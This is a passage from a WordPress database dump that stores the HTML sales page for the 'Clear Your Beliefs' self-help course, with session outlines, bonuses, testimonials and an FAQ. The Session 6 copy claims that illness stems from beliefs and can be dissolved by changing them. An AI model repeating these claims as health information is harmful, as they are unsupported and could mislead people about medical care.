session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1894, 2174, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72769:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	